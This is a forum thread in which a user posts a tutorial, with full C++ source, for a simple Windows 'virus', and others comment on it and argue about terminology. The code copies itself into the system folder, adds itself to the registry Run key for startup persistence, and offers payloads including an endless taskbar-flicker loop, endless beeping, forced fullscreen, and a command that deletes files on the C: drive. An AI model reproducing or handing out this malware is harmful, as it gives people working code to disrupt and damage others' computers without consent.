Malicious Coding.

[ebrizzlez]

Ok. This tutorial was insipired by the constant asking of viriuses and keyloggers, and requested by bubzuru. The Art of Virii is a wonderful world of top of the line programming.

A computer virus is a computer program that can copy itself and infect a computer without permission or knowledge of the user. The original may modify the copies or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or carrying it on a removable medium such as a floppy disk, CD, or USB driver

As explained below by pseudo and floodhound, API (Application Programming Interface) is a way for your virus to have a talk with windows and see how much damage you can cause with that chat. Although, malicous viruses are mainly coded low level such as Assembley, we are not here to wipe out harddrives nor other malicous work, but here to examine a virus. This tutorial will teach you the baiscs of virus building.

Requirements:
1.C++ Compiler (DEV C++ recommended)(www.bloodshed.net)
2.Some knownledge required, but not needed.
3.Some ass kicking grey hats.

Ok, to start we will try to hide the windows. But of course we need the heading too! We will be using the windows.h, winable.h , and the string.h heading files. Then we need to indicate that the window will be hiding so we past a few parameters into the main() function in which indicates it to hide. Here is what you can type in so far:

Code: Select all

#include "windows.h"
#include "winable.h"
#include "string.h"

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil)

{
 
 return 0;
}

Ok. So good so far. You dont really need any other heading currently, but later on I will show you some things you can add with them. When you compile the source, nothing happens because it just returns the value zero to int and then closes out. You may notice that the source indicates its a WINDOWS API and its the Main Window. Now lets add something to make our application look better.

Code: Select all

MessageBox(NULL,”Hello World”,”The Art Of Virii”,MB_OK);

That little snippet above just sends a message saying hello world, this isnt a virus yet, just an example of what else we can do with API programming. You can delete the example above if you like. Now lets make our application a bit better.

Code: Select all

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
MessageBox(NULL,”Hello World”,”The Art of Virii by Ebrizzlez”,MB_OK);

Ok, now our program has the structure of a virus. It creates a string that finds where the system folder is located. Thats why we use the HMOUDLE, and we also pass the MAX_PATH as a buffer to linit the search, then we use CopyFile() function to look for the system file, and once found, copy virus.exe into it. If you go into the system folder you will see it will popup with our message indicating it works. Now, here comes the sick part. We will be editing the register so you have to be careful, its recommended you dont run this application anymore unless you know how to fix the registery. Or you can skip this part and test the other parts.

Code: Select all

HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey); 

Simple right? It just simply edits the registery so it runs off during startup then closes the registery.
Now here comes the best part of our virus, the payload! Now if there thinking right now "sweet! I am gonna reformat the users drive with the payload" then get off right now! ost virus builders hate others whom just crash others computer with a simple reformat command. Where is the fun? Virii is an art, and it shouldnt be abused. Most viruses dont reformat the drive but slip in and attack certain files for the user to get more pissed. You should always leave your target alive, until you gotten all the information needed, then and only then may you kill them. And I wouldnt recommend doing so. Here are a few tricks you can add:

Payload 1. (Please decide a payload best for you, or pick all. )

Code: Select all

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

 return 0;
}

Use the snippet above to mess with the startbar, although, its easily fixed by pressing Alt + Ctrl + Del, it can be a bit in the pain of the ass and perfect for those noobs.

Payload 2.

Code: Select all

int Freq = 100;
int Duration = 100;
Beep(Freq,Duration);
while(1==1)
{Beep(Freq,Duration);}
}

This code makes the computer beep like crazy, another annoying thing. You can use this loop and make a popup message using the MessageBox() commands for every beep.

Payload 3.

Code: Select all

keybd_event (VK_MENU, 0x38, 0, 0);
keybd_event (VK_RETURN, 0x1c, 0, 0);
keybd_event (VK_RETURN, 0X1c, KEYEVENTF_KEYUP, 0);
keybd_event (VK_MENU, 0x38, KEYEVENTF_KEYUP, 0);
Printf("Mess with the best, die like the rest. \n")

This throws the screen into full screen, so all the user sees is a black boring screen that displays the message. This can be useful at sometimes to hide other viruses that run visablely.

Payload 4.

Code: Select all

system("del C:/*.*")

Like I said, VIRII ISNT REFORMATING PEOPLES DRIVE. But if you must, then ok. The last payload is what we programmers call a Batch Back Out, when a user uses batch in order to do something, which at most time is a bit noobish. Anything done in batch can be proformed twice as good with low level programming. Your code should look like this in the end:

Code: Select all

#include "windows.h"

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
                            LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey); 

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

 return 0;
}

Thats if you use the first payload. Your code may look different depending on what use did or use. I hope you found this any good. You must remember, Virii building is an Art. This isnt much of a deadly or even classified as a useful virus but it shows you how to copy the file like a virus would do, and how to edit the registery like most viruses would do. I am hoping floodhound and the other admins can reflect there opinions so that I can know, and for you noobs, I hope this gave you a better understandment.

[bubzuru]

nice tut thax
get the compiler here

Code: Select all

http://www.megaupload.com/?d=URSQHOJX

[Macross]

Nice, thanks

[ebrizzlez]

Np. If there is anything else you want to see bubzuru , I am here for you. And please put offsite links in the Code box, so not many users will sign out this site. Thanks.

[bubzuru]

If there is anything else you want to see bubzuru

it would br gr8 if u did a tut on just paylodes wot do u mean by off site links

[ebrizzlez]

Well Get the Compiler link redircts you to off this site, so instead, put something like this

Code: Select all

www.offsitelinks.com

And I might show add some payloads, but there useless if you dont have the body of the virus.
[edit] Try to speak proper english, the admins might get pissed. Plus, big eye issues at night time when I sign on. Just an advanced warning.

[pseudo_opcode]

First of all i'd say a very good post.. BUT, did you make it yourself? anyway i hate correcting people but still

Thats if you use the first payload. Your code may look different depending on what use did or use. I hope you found this any good. You must remember, Virii building is an Art. The art is of programming, only great viruses are programmed flawless, and most virii arent much harm. I am hoping floodhound and the other admins can reflect there opinions so that I can know, and for you noobs, I hope this gave you a better understandment.

Since you ask for it, there ya go..
i m sorry to say but, this program does not qualify as a virus,
A typical internet virus has following main components
1.Vulnerability Scanning
2.Exploitation
3.Proliferation
4.Copying====most important part

Vulnerability scanning is required to find new exploitable targets, which is followed by exploitation, a virus is not a virus if it doesnt multiply,
you in your post are trying to redefine a virus???

Second thing, you disappointed me by saying,

Most viruses (that are good) are coded in the API section (Application Programming Interface)

Actually it is true but not completely true, API is a functionality which can be used in code, try formatting c drive while you have already loaded windows, and it wont be able to format it.
Ever seen partition magic? When you ask it to format a C drive and you have windows on C drive, it reboots and then formats, because even if it uses API it can format windows while it is loaded, api also have some limitations, thats why we prefer low level stuff, things come to assembly,
you usually put a virus at the disk's MBR, APIs are at the OS level, where as assembly can be at hardware level too, you can directly take over a computer, directly write to video memory by specifying the addresses explicitly, just imagine how much chaos you can create.

What you've given is simply a nasty program which can really screw things up, and not a virus, and definitely not an "Art of virii"
But still i appreciate that you have tries something useful.. not many people here try their hands on this stuff..(provided you did it yourself)

*Note to b_b=HTML tags are really strict,pissed me off in this post

[floodhound2]

Note: I did not spend much time reading this yet, but I will soon.

So far I agree with Pseudo, some of the things are not correct.

I am going to test some of this because I have never seen C code using visual basic type instruction. It is as if you float around from one language to the next, however just because I never code in C like this does not mean it will not work.

Also I become confused when you state that “API allows the program to connect and interact with windows and your os.” Last I knew Windows is your OS.

If I remember correctly and in a nut shell - API allows you to “ask Windows” for permission “to a specific”, already written code form Microsoft. This is so that Microsoft can keep the grip on its operating system and always remain in control.

Thus said: how one can write a virus from existing code? Yes and true; you may be able to do some harm “limited” but this is not the true nature of a virus if you ask me.

[ebrizzlez]

Thanks for the info, I will take note on that. I personally dont know much of Assebly so I hadnt know that so thanks. I never really did low level programming so I am gonna check that out. And no ones perfect and I actually appericate the thoughts, it helps me learn more and thats what I am here for. I read a few topics on this so I myself dont know much. And html tags were annoying and forced lots of editing on me.
[edit] I will make a few mods. based around what you said when I get the chance.

[ebrizzlez]

I made some few modification towards the tutorial. Check to see if its correct or not, and tell me if something doesnt sound right or anything. Thanks you guys.
btw. Earlier I said you use api to connect and interact with windows cause I was learning Qt and Qt creates slots that you connect to each other and then you are able to interact with your OS. I also said windows or your OS because I thought this code could be muti-platform, but I forgot Unix systems dont have a system folder.

[pseudo_opcode]

Please change the topic from Art of virii to something else like malicious program or something, coz we dont want noobs to get wrong impression of viruses, also in cyber world unlike medical science,we call them viruses instead of virii

[ebrizzlez]

During the post hours, I found it easier to type virii instead of viruses. But I will change the topic.

[bubzuru]

also in cyber world unlike medical science,we call them viruses instead of virii

a lot of people prefere to use virii

[ayu]

also in cyber world unlike medical science,we call them viruses instead of virii

a lot of people prefere to use virii

The same people who talk 1337?

(i admit, i use it sometimes, but i don't talk 1337)

[ebrizzlez]

also in cyber world unlike medical science,we call them viruses instead of virii

a lot of people prefere to use virii

The same people who talk 1337?

(i admit, i use it sometimes, but i don't talk 1337)

May I say this again, during the time peroid, I was a bit tired and in a rush so I couldnt constantly write viruses so I wrote virii. I had to finish before my dad got home.
And personally, I hate the people who talk 1337 its unwanted, and sure is a pain in the ass to see this: "h3110 mY nAm 15 r3tArd!" You dont know how many noobs I chat whom talk like that! It drives me crazy. But I catch myself shorting things while in rushes e.g. that = dat.